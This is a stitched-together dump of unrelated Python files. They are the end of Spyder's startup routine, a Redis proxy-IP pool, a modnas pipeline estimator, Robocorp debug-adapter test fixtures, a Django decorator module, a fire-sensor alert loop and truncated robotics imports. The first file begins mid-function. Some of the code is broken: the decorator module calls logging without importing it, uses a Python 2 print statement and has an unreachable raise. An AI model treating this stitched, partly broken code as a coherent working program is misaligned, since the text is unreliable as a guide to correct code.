# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.black)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(
MainWindow, app, splash, options, args
)
else:
mainwindow = create_window(MainWindow, app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
py_cli.py
|
"""
This module privodes core algrithm to pick up proxy ip resources.
"""
import time
import threading
from utils import get_redis_conn
from config.settings import (
DATA_ALL, LOWEST_TOTAL_PROXIES)
from .core import IPFetcherMixin
__all__ = ['ProxyFetcher']
lock = threading.RLock()
class Strategy:
strategy = None
def check(self, strategy):
return self.strategy == strategy
def get_proxies_by_stragery(self, pool):
"""
:param pool: pool is a list, which is mutable
:return:
"""
raise NotImplementedError
def process_feedback(self, pool, res, proxy, **kwargs):
"""
:param pool: ProxyFetcher's pool
:param res: success or failure
:param proxy: proxy ip
:param kwargs: response time or expected response time
:return: None
"""
raise NotImplementedError
class RobinStrategy(Strategy):
def __init__(self):
super().__init__()
self.strategy = 'robin'
def get_proxies_by_stragery(self, pool):
if not pool:
return None
proxy = pool.pop(0)
pool.append(proxy)
return proxy
def process_feedback(self, pool, res, proxy, **kwargs):
if res == 'failure':
if pool[-1] == proxy:
with lock:
if pool[-1] == proxy:
pool.pop()
return
class GreedyStrategy(Strategy):
def __init__(self):
self.strategy = 'greedy'
def get_proxies_by_stragery(self, pool):
if not pool:
return None
return pool[0]
def process_feedback(self, pool, res, proxy, **kwargs):
if res == 'failure':
if pool[0] == proxy:
with lock:
if pool[0] == proxy:
pool.pop(0)
return
expected_time = kwargs.get('expected')
real_time = kwargs.get('real')
if expected_time * 1000 < real_time:
pool.pop(0)
pool.append(proxy)
class ProxyFetcher(IPFetcherMixin):
def __init__(self, usage, strategy='robin', fast_response=5, redis_args=None):
"""
:param usage: one of SCORE_MAPS's keys, such as https
you must refresh pool
:param strategy: the load balance of proxy ip, the value is
one of ['robin', 'greedy']
:param fast_response: if you use greedy strategy, if will be needed to
decide whether a proxy ip should continue to be used
:param redis_args: redis connetion args, it's a dict, the keys
include host, port, db and password
"""
# if there are multi parent classes, super is only used for the first parent according to MRO
super().__init__(usage)
self.strategy = strategy
# pool is a queue, which is FIFO
self.pool = list()
self.fast_response = fast_response
self.handlers = [RobinStrategy(), GreedyStrategy()]
if isinstance(redis_args, dict):
self.conn = get_redis_conn(**redis_args)
else:
self.conn = get_redis_conn()
t = threading.Thread(target=self._refresh_periodically)
t.setDaemon(True)
t.start()
def get_proxy(self):
"""
get one available proxy from redis, if not any, None is returned
:return:
"""
proxy = None
self.refresh()
for handler in self.handlers:
if handler.strategy == self.strategy:
proxy = handler.get_proxies_by_stragery(self.pool)
return proxy
def get_proxies(self):
# the older proxies will not be droped
proxies = self.get_available_proxies(self.conn)
# client_logger.info('{} proxies have been fetched'.format(len(proxies)))
print('{} proxies have been fetched'.format(len(proxies)))
self.pool.extend(proxies)
return self.pool
def proxy_feedback(self, res, proxy, response_time=None):
"""
client should give feedbacks after executing get_proxy()
:param res: value of 'success' or 'failure'
:param proxy: proxy ip
:param response_time: the response time using current proxy ip
"""
for handler in self.handlers:
if handler.strategy == self.strategy:
handler.process_feedback(self.pool, res,
proxy, real=response_time,
expected=self.fast_response)
def refresh(self):
if len(self.pool) < LOWEST_TOTAL_PROXIES:
self.get_proxies()
def delete_proxy(self, proxy):
pipe = self.conn.pipeline(True)
pipe.srem(DATA_ALL, proxy)
pipe.zrem(self.score_queue, proxy)
pipe.zrem(self.speed_queue, proxy)
pipe.zrem(self.ttl_queue, proxy)
pipe.execute()
def _refresh_periodically(self):
"""refresh self.pool periodically.Check 10 times in a second"""
while True:
if len(self.pool) < int(2 * LOWEST_TOTAL_PROXIES):
self.get_proxies()
time.sleep(0.2)
|
pipeline.py
|
# -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Pipeline Estimator."""
import traceback
import queue
from multiprocessing import Process, Pipe
from ..base import EstimBase
from modnas.registry.runner import build as build_runner
from modnas.registry import parse_spec
from modnas.registry.estim import register
def _mp_step_runner(conn, step_conf):
ret = build_runner(step_conf)
conn.send(ret)
def _mp_runner(step_conf):
p_con, c_con = Pipe()
proc = Process(target=_mp_step_runner, args=(c_con, step_conf))
proc.start()
proc.join()
if not p_con.poll(0):
return None
return p_con.recv()
def _default_runner(step_conf):
return build_runner(step_conf)
@register
class PipelineEstim(EstimBase):
"""Pipeline Estimator class."""
def __init__(self, *args, use_multiprocessing=False, **kwargs):
super().__init__(*args, **kwargs)
self.runner = _mp_runner if use_multiprocessing else _default_runner
def step(self, step_conf):
"""Return results from single pipeline process."""
try:
return self.runner(step_conf)
except RuntimeError:
self.logger.info('pipeline step failed with error: {}'.format(traceback.format_exc()))
return None
def run(self, optim):
"""Run Estimator routine."""
del optim
logger = self.logger
config = self.config
pipeconf = config.pipeline
pending = queue.Queue()
for pn in pipeconf.keys():
pending.put(pn)
finished = set()
ret_values, ret = dict(), None
while not pending.empty():
pname = pending.get()
pconf = pipeconf.get(pname)
dep_sat = True
for dep in pconf.get('depends', []):
if dep not in finished:
dep_sat = False
break
if not dep_sat:
pending.put(pname)
continue
ptype, pargs = parse_spec(pconf)
pargs['name'] = pargs.get('name', pname)
for inp_kw, inp_idx in pconf.get('inputs', {}).items():
keys = inp_idx.split('.')
inp_val = ret_values
for k in keys:
if not inp_val or k not in inp_val:
raise RuntimeError('input key {} not found in return {}'.format(inp_idx, ret_values))
inp_val = inp_val[k]
pargs[inp_kw] = inp_val
logger.info('pipeline: running {}, type={}'.format(pname, ptype))
ret = self.step(pconf)
ret_values[pname] = ret
logger.info('pipeline: finished {}, results={}'.format(pname, ret))
finished.add(pname)
ret_values['final'] = ret
logger.info('pipeline: all finished')
return ret_values
|
fixtures.py
|
# coding: utf-8
# Original work Copyright Fabio Zadrozny (EPL 1.0)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from robocorp_ls_core.unittest_tools.fixtures import TIMEOUT
from robocorp_ls_core.subprocess_wrapper import subprocess
from collections import namedtuple
import queue
import threading
import pytest # type: ignore
import sys
import os
from typing import Dict, Optional, Iterable
from robocorp_ls_core.options import DEFAULT_TIMEOUT
import typing
if typing.TYPE_CHECKING:
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Variable
__file__ = os.path.abspath(__file__)
if __file__.endswith((".pyc", ".pyo")):
__file__ = __file__[:-1]
_JsonHit = namedtuple("_JsonHit", "thread_id, frame_id, stack_trace_response")
@pytest.fixture
def dap_logs_dir(tmpdir):
import locale
logs_directory = tmpdir.join("logs_adapter")
logs_directory.mkdir()
yield logs_directory
for name in os.listdir(str(logs_directory)):
sys.stderr.write("\n--- %s contents:\n" % (name,))
if name in ("output.xml", "report.html", "log.html"):
sys.stderr.write("--- Not printed --- \n\n")
continue
with open(str(logs_directory.join(name)), "rb") as stream:
contents = stream.read().decode(locale.getpreferredencoding(), "replace")
sys.stderr.write(contents)
sys.stderr.write("\n\n")
@pytest.fixture
def dap_log_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests.log"))
sys.stderr.write("Logging subprocess to: %s\n" % (filename,))
yield filename
@pytest.fixture
def dap_process_stderr_file(dap_logs_dir):
filename = str(dap_logs_dir.join("robotframework_dap_tests_stderr.log"))
sys.stderr.write("Output subprocess stderr to: %s\n" % (filename,))
with open(filename, "wb") as stream:
yield stream
@pytest.fixture
def dap_process(dap_log_file, dap_process_stderr_file):
from robotframework_debug_adapter import __main__
from robocorp_ls_core.basic import kill_process_and_subprocesses
env = os.environ.copy()
env["ROBOTFRAMEWORK_DAP_LOG_LEVEL"] = "3"
env["ROBOTFRAMEWORK_DAP_LOG_FILENAME"] = dap_log_file
env["PYDEVD_DEBUG_FILE"] = dap_log_file
env["PYDEVD_DEBUG"] = "1"
dap_process = subprocess.Popen(
[sys.executable, "-u", __main__.__file__],
stdout=subprocess.PIPE,
stderr=dap_process_stderr_file,
stdin=subprocess.PIPE,
env=env,
)
assert dap_process.returncode is None
yield dap_process
if dap_process.returncode is None:
kill_process_and_subprocesses(dap_process.pid)
class _DebuggerAPI(object):
def __init__(
self,
reader=None,
writer=None,
write_queue=None,
read_queue=None,
dap_resources_dir=None,
):
self.reader = reader
self.writer = writer
self.write_queue = write_queue
self.read_queue = read_queue
self.all_messages_read = []
self.target = None
self.cwd = None
self.suite_target = None
self.dap_resources_dir = dap_resources_dir
def write(self, msg):
"""
:param BaseSchema msg:
The message to be written.
"""
self.write_queue.put(msg)
return msg
def read(self, expect_class=None, accept_msg=None):
"""
Waits for a message and returns it (may throw error if there's a timeout waiting for the message).
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import OutputEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneResponse,
)
while True:
msg = self.read_queue.get(timeout=TIMEOUT)
if hasattr(msg, "to_dict"):
sys.stderr.write("Read: %s\n\n" % (msg.to_dict(),))
else:
sys.stderr.write("Read: %s\n\n" % (msg,))
self.all_messages_read.append(msg)
if expect_class is not None or accept_msg is not None:
if self._matches(msg, expect_class, accept_msg):
return msg
# Skip OutputEvent and ConfigurationDoneResponse. Other events must match.
if not isinstance(msg, (OutputEvent, ConfigurationDoneResponse)):
raise AssertionError(
"Received: %s when expecting: %s" % (msg, expect_class)
)
else:
# expect_class and accept_msg are None
return msg
return msg
def assert_message_found(self, expect_class=None, accept_msg=None):
for msg in self.all_messages_read:
if self._matches(msg, expect_class, accept_msg):
return True
raise AssertionError("Did not find expected message.")
def _matches(self, msg, expect_class=None, accept_msg=None):
if (expect_class is None or isinstance(msg, expect_class)) and (
accept_msg is None or accept_msg(msg)
):
return True
return False
def get_dap_case_file(self, filename, must_exist=True):
import os.path
ret = os.path.join(self.dap_resources_dir, filename)
if must_exist:
assert os.path.exists(ret), "%s does not exist." % (ret,)
return ret
def initialize(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializeRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
InitializeResponse,
)
self.write(
InitializeRequest(
InitializeRequestArguments(
adapterID="robotframework-lsp-adapter",
clientID="Stub",
clientName="stub",
locale="en-us",
linesStartAt1=True,
columnsStartAt1=True,
pathFormat="path",
supportsVariableType=True,
supportsVariablePaging=True,
supportsRunInTerminalRequest=True,
)
)
)
initialize_response = self.read(InitializeResponse)
assert isinstance(initialize_response, InitializeResponse)
assert initialize_response.request_seq == 0
assert initialize_response.success
assert initialize_response.command == "initialize"
return initialize_response
def configuration_done(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
ConfigurationDoneRequest,
)
self.write(ConfigurationDoneRequest())
def step_in(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepInResponse
arguments = StepInArguments(threadId=thread_id)
self.write(StepInRequest(arguments))
self.read(StepInResponse)
def step_next(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import NextResponse
arguments = NextArguments(threadId=thread_id)
self.write(NextRequest(arguments))
self.read(NextResponse)
def step_out(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StepOutResponse
arguments = StepOutArguments(threadId=thread_id)
self.write(StepOutRequest(arguments))
self.read(StepOutResponse)
def continue_event(self, thread_id, accept_terminated=False):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ContinueResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import TerminatedEvent
arguments = ContinueArguments(thread_id)
self.write(ContinueRequest(arguments))
expected = [ContinueResponse]
if accept_terminated:
expected.append(TerminatedEvent)
return self.read(expect_class=tuple(expected))
def launch(
self,
target,
debug=True,
success=True,
terminal="none",
args: Optional[Iterable[str]] = None,
env: Optional[dict] = None,
make_suite: Optional[bool] = None,
):
"""
:param args:
The arguments to the launch (for instance:
["--variable", "my_var:22"]
)
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
LaunchRequestArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import LaunchResponse
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
RunInTerminalRequest,
)
from robocorp_ls_core.basic import as_str
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import InitializedEvent
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ProcessEvent
launch_args = LaunchRequestArguments(
__sessionId="some_id",
noDebug=not debug,
target=target,
terminal=terminal,
env=env,
cwd=self.cwd,
suiteTarget=self.suite_target,
)
if args:
launch_args.kwargs["args"] = args
if make_suite is not None:
launch_args.kwargs["makeSuite"] = make_suite
self.write(LaunchRequest(launch_args))
if terminal == "external":
run_in_terminal_request = self.read(RunInTerminalRequest)
external_env = os.environ.copy()
for key, val in run_in_terminal_request.arguments.env.to_dict().items():
external_env[as_str(key)] = as_str(val)
cwd = run_in_terminal_request.arguments.cwd
popen_args = run_in_terminal_request.arguments.args
subprocess.Popen(
popen_args, cwd=cwd, env=external_env, shell=sys.platform == "win32"
)
if success:
# Initialized is sent just before the launch response (at which
# point it's possible to send breakpoints).
self.read((ProcessEvent, InitializedEvent))
self.read((ProcessEvent, InitializedEvent))
if success:
launch_response = self.read(LaunchResponse)
else:
launch_response = self.read(Response)
assert launch_response.success == success
def list_threads(self):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ThreadsRequest
return self.wait_for_response(self.write(ThreadsRequest()))
def set_breakpoints(self, target, lines, line_to_kwargs={}):
import os.path
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Source
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import SourceBreakpoint
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetBreakpointsResponse,
)
if isinstance(lines, int):
lines = (lines,)
assert isinstance(lines, (list, tuple))
self.write(
SetBreakpointsRequest(
SetBreakpointsArguments(
source=Source(name=os.path.basename(target), path=target),
lines=lines,
breakpoints=[
SourceBreakpoint(
line=line, **line_to_kwargs.get(line, {})
).to_dict()
for line in lines
],
)
)
)
response = self.read(SetBreakpointsResponse)
assert len(response.body.breakpoints) == len(lines)
def set_exception_breakpoints(self, filters):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetExceptionBreakpointsRequest,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetExceptionBreakpointsArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
SetExceptionBreakpointsResponse,
)
self.write(
SetExceptionBreakpointsRequest(
SetExceptionBreakpointsArguments(filters=filters)
)
)
response = self.read(SetExceptionBreakpointsResponse)
assert response.success
def wait_for_response(self, request, response_class=None):
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
get_response_class,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Response
if response_class is None:
response_class = get_response_class(request)
def accept_message(response):
if isinstance(request, dict):
if response.request_seq == request["seq"]:
return True
else:
if response.request_seq == request.seq:
return True
return False
return self.read((response_class, Response), accept_message)
def get_stack_as_json_hit(self, thread_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
StackTraceArguments,
)
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StackTraceRequest
stack_trace_request = self.write(
StackTraceRequest(StackTraceArguments(threadId=thread_id))
)
# : :type stack_trace_response: StackTraceResponse
# : :type stack_trace_response_body: StackTraceResponseBody
# : :type stack_frame: StackFrame
stack_trace_response = self.wait_for_response(stack_trace_request)
stack_trace_response_body = stack_trace_response.body
assert len(stack_trace_response_body.stackFrames) > 0
stack_frame = next(iter(stack_trace_response_body.stackFrames))
return _JsonHit(
thread_id=thread_id,
frame_id=stack_frame["id"],
stack_trace_response=stack_trace_response,
)
def wait_for_thread_stopped(
self, reason="breakpoint", line=None, file=None, name=None
):
"""
:param file:
utf-8 bytes encoded file or unicode
"""
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import StoppedEvent
stopped_event = self.read(StoppedEvent)
assert stopped_event.body.reason == reason
json_hit = self.get_stack_as_json_hit(stopped_event.body.threadId)
if file is not None:
path = json_hit.stack_trace_response.body.stackFrames[0]["source"]["path"]
if not path.replace("\\", "/").endswith(file.replace("\\", "/")):
raise AssertionError("Expected path: %s to end with: %s" % (path, file))
if name is not None:
assert json_hit.stack_trace_response.body.stackFrames[0]["name"] == name
if line is not None:
found_line = json_hit.stack_trace_response.body.stackFrames[0]["line"]
if not isinstance(line, (tuple, list)):
line = [line]
assert found_line in line, "Expect to break at line: %s. Found: %s" % (
line,
found_line,
)
return json_hit
def get_line_index_with_content(self, line_content, filename=None):
"""
:return the line index which has the given content (1-based).
"""
if filename is None:
filename = self.target
with open(filename, "r", encoding="utf-8") as stream:
for i_line, line in enumerate(stream):
if line_content in line:
return i_line + 1
raise AssertionError("Did not find: %s in %s" % (line_content, filename))
def get_name_to_scope(self, frame_id):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesArguments
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import ScopesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Scope
scopes_request = self.write(ScopesRequest(ScopesArguments(frame_id)))
scopes_response = self.wait_for_response(scopes_request)
scopes = scopes_response.body.scopes
name_to_scopes = dict((scope["name"], Scope(**scope)) for scope in scopes)
assert len(scopes) == 3
assert sorted(name_to_scopes.keys()) == ["Arguments", "Builtins", "Variables"]
assert name_to_scopes["Arguments"].presentationHint == "locals"
return name_to_scopes
def get_name_to_var(self, variables_reference: int) -> Dict[str, "Variable"]:
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import Variable
variables_response = self.get_variables_response(variables_reference)
return dict(
(variable["name"], Variable(**variable))
for variable in variables_response.body.variables
)
def get_arguments_name_to_var(self, frame_id: int) -> Dict[str, "Variable"]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Arguments"].variablesReference)
def get_variables_name_to_var(self, frame_id: int) -> Dict[str, "Variable"]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Variables"].variablesReference)
def get_builtins_name_to_var(self, frame_id: int) -> Dict[str, "Variable"]:
name_to_scope = self.get_name_to_scope(frame_id)
return self.get_name_to_var(name_to_scope["Builtins"].variablesReference)
def get_variables_response(self, variables_reference, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import VariablesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
VariablesArguments,
)
variables_request = self.write(
VariablesRequest(VariablesArguments(variables_reference, format=fmt))
)
variables_response = self.wait_for_response(variables_request)
assert variables_response.success == success
return variables_response
def evaluate(self, expression, frameId=None, context=None, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateArguments
eval_request = self.write(
EvaluateRequest(
EvaluateArguments(
expression, frameId=frameId, context=context, format=fmt
)
)
)
eval_response = self.wait_for_response(eval_request)
assert (
eval_response.success == success
), "Expected success to be: %s (found: %s).\nMessage:\n%s" % (
success,
eval_response.success,
eval_response.to_dict(),
)
return eval_response
@pytest.fixture(scope="session")
def dap_resources_dir(tmpdir_factory):
from robocorp_ls_core.copytree import copytree_dst_exists
basename = u"dap áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), u"_dap_resources")
assert os.path.exists(original_resources_dir)
copytree_dst_exists(original_resources_dir, copy_to)
resources_dir = copy_to
assert os.path.exists(resources_dir)
return resources_dir
@pytest.fixture
def debugger_api_core(dap_resources_dir):
return _DebuggerAPI(dap_resources_dir=dap_resources_dir)
@pytest.fixture
def debugger_api(dap_process, dap_resources_dir):
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import writer_thread
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import reader_thread
write_to = dap_process.stdin
read_from = dap_process.stdout
write_queue = queue.Queue()
read_queue = queue.Queue()
writer = threading.Thread(
target=writer_thread, args=(write_to, write_queue), name="Debugger API writer"
)
writer.daemon = True
reader = threading.Thread(
target=reader_thread,
args=(read_from, read_queue.put, read_queue),
name="Debugger API reader",
)
reader.daemon = True
reader.start()
writer.start()
return _DebuggerAPI(
reader=reader,
writer=writer,
write_queue=write_queue,
read_queue=read_queue,
dap_resources_dir=dap_resources_dir,
)
class RunRobotThread(threading.Thread):
def __init__(self, dap_logs_dir):
threading.Thread.__init__(self)
self.target = None
self.dap_logs_dir = dap_logs_dir
self.result_code = None
self.result_event = threading.Event()
def run(self):
import robot # type: ignore
code = robot.run_cli(
[
"--outputdir=%s" % (self.dap_logs_dir,),
"--listener=robotframework_debug_adapter.listeners.DebugListener",
"--listener=robotframework_debug_adapter.listeners.DebugListenerV2",
self.target,
],
exit=False,
)
self.result_code = code
def run_target(self, target):
self.target = target
self.start()
@pytest.fixture
def robot_thread(dap_logs_dir):
"""
Fixture for interacting with the debugger api through a thread.
"""
t = RunRobotThread(dap_logs_dir)
yield t
dbg_wait_for(
lambda: t.result_code is not None,
msg="Robot execution did not finish properly.",
)
def dbg_wait_for(condition, msg=None, timeout=DEFAULT_TIMEOUT, sleep=1 / 20.0):
from robocorp_ls_core.basic import wait_for_condition
if "pydevd" in sys.modules:
timeout = sys.maxsize
wait_for_condition(condition, msg, timeout, sleep)
|
decorator_util.py
|
# -*- coding: utf-8 -*-
import functools
import threading
# 装饰器模块
import time
from common_util import response_json
from utils.common_util import get_except
logger = logging.getLogger('django')
def myasync(func):
"""
实现函数异步执行
:param param1: this is a first param
:param param2: this is a second param
:returns: 返回json格式的异常到前台
:raises keyError: raises an exception
@author: jhuang
@time:08/02/2018
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
my_thread = threading.Thread(target=func, args=args, kwargs=kwargs)
my_thread.start()
return wrapper
def view_except(error_code=99):
"""
装饰器,视图异常捕获
:param param1: this is a first param
:param param2: this is a second param
:returns: 返回json格式的异常到前台
:raises keyError: raises an exception
@author: jhuang
@time:08/02/2018
"""
def wrapper(func):
def inner_wrapper(*args, **kwargs):
try:
start_time = time.time()
ret= func(*args, **kwargs)
# logger.debug('函数(%s)用时:%s' % (__name__,time.time() - start_time))
print '函数(%s)用时(s):%s' % (func.__name__,time.time() - start_time)
return ret
except Exception as e:
# pass
logger.exception('view_except')
return response_json(get_except(e), error_code=error_code)
# re-raise the exception
raise
return inner_wrapper
return wrapper
|
objects_processing.py
|
from datetime import datetime, timedelta
from threading import Thread
from time import sleep
from app.models import Object, ObjectStatusJob, Sensor, SensorStatusJob, SensorStatusSituation, ObjectStatusSituation, \
Report
from app.notifications import send_notification, send_notification_emergency
texts = {
'off': 'The FSafe system for the object \"{}\" has been disabled.\n\n'
'Go to <a href=\"https://fsafe.yegoryakubovich.com/account/state/{}\">State page</a> for details',
'defect': 'Sensors of object \"{}\" has defect.\n\n'
'Go to <a href=\"https://fsafe.yegoryakubovich.com/account/state/{}\">State page</a> for details',
'fire': 'Информация в данном сообщении является недостоверной. Сенсорами на объекте "{}" в комнате "{}"'
'был обнаружен пожар!\n\nМы уведомили экстренные службы',
'warning': 'Ситуация переведена в статус предупреждения. Будьте аккуратны!',
'stable': 'Ситуация переведена в статус стабильно.',
'fire_emergency': 'Информация в данном сообщении является недостоверной. Автоматический звонок системой Fire Safe!'
'\n\nИзвещателями был замечен пожар по адресу "{}". Комната: {}.',
}
def objects_processing():
for obj in Object.select():
status_job_init = obj.status_job
status_situation_init = obj.status_situation
obj_sensors = [s for s in Sensor.select().where(Sensor.object == obj)]
if not obj_sensors:
continue
obj_sensors_j = [s.status_job for s in obj_sensors]
obj_sensors_s = [s.status_situation for s in obj_sensors]
count_on = obj_sensors_j.count(SensorStatusJob.on)
count_off = obj_sensors_j.count(SensorStatusJob.off)
count_broken = obj_sensors_j.count(SensorStatusJob.broken)
count_discharged = obj_sensors_j.count(SensorStatusJob.discharged)
if count_on == len(obj_sensors):
obj.status_job = ObjectStatusJob.on
elif len(obj_sensors) == count_off + count_broken + count_discharged:
obj.status_job = ObjectStatusJob.off
else:
obj.status_job = ObjectStatusJob.defect
count_null = obj_sensors_s.count(SensorStatusSituation.null)
count_fire = obj_sensors_s.count(SensorStatusSituation.fire)
count_warning = obj_sensors_s.count(SensorStatusSituation.warning)
if count_null == len(obj_sensors):
obj.status_situation = ObjectStatusSituation.null
elif count_fire:
obj.status_situation = ObjectStatusSituation.fire
elif count_warning:
obj.status_situation = ObjectStatusSituation.warning
else:
obj.status_situation = ObjectStatusSituation.stable
obj.save()
if status_job_init != obj.status_job:
# any => off
if obj.status_job == ObjectStatusJob.off:
send_notification(account=obj.account,
notification=texts['off'].format(obj.name, obj.id))
# any => defect
elif obj.status_job == ObjectStatusJob.defect:
send_notification(account=obj.account,
notification=texts['defect'].format(obj.name, obj.id))
if status_situation_init != obj.status_situation:
# fire, call+emergency
if obj.status_situation == ObjectStatusSituation.fire:
sensor_fire = Sensor.get_or_none((Sensor.object == obj)
& (Sensor.status_situation == SensorStatusSituation.fire))
send_notification(account=obj.account,
notification=texts['fire'].format(obj.name, sensor_fire.description), call=True)
send_notification_emergency(notification=texts['fire_emergency']
.format(obj.address, sensor_fire.description))
# warning
elif obj.status_situation == ObjectStatusSituation.warning:
send_notification(account=obj.account, notification=texts['warning'])
# warning => stable
elif obj.status_situation == ObjectStatusSituation.stable \
and status_situation_init == SensorStatusSituation.warning:
send_notification(account=obj.account, notification=texts['stable'])
def sensors_processing():
for sensor in Sensor.select():
request = Report.select().where(Report.sensor == sensor).limit(1).order_by(Report.datetime.desc())
report_last = [r for r in request]
if report_last:
report = report_last[0]
time_limited = datetime.now() - timedelta(minutes=3)
if report.datetime <= time_limited:
if sensor.status_situation in [SensorStatusSituation.fire, SensorStatusSituation.warning]:
sensor.status_job = SensorStatusJob.broken
elif sensor.battery <= 15:
sensor.status_job = SensorStatusJob.discharged
sensor.status_situation = SensorStatusSituation.null
else:
sensor.status_job = SensorStatusJob.off
sensor.status_situation = SensorStatusSituation.null
else:
sensor.status_job = SensorStatusJob.off
sensor.save()
def processing():
while True:
try:
objects_processing()
sensors_processing()
sleep(5)
except Exception as e:
print(e)
def create_processing():
Thread(target=processing, args=()).start()
|
baxter_mjc_env.py
|
# import matplotlib as mpl
# mpl.use('Qt4Agg')
import matplotlib.pyplot as plt
import numpy as np
import os
from threading import Thread
import time
import traceback
import sys
import xml.etree.ElementTree as xml
from tkinter import TclError
import pybullet as P
from dm_control.mujoco import Physics
from dm_control.rl.control import PhysicsError
from dm_control.viewer import runtime
from dm_control.viewer import user_input
from dm_control.viewer import util
from gym import spaces
from gym.core import Env
import opentamp
from opentamp.envs import MJCEnv
from opentamp.util_classes.ik_controller import BaxterIKController
from opentamp.util_classes.mjc_xml_utils import *
from opentamp.util_classes import transform_utils as T
from core.util_classes.robots import *
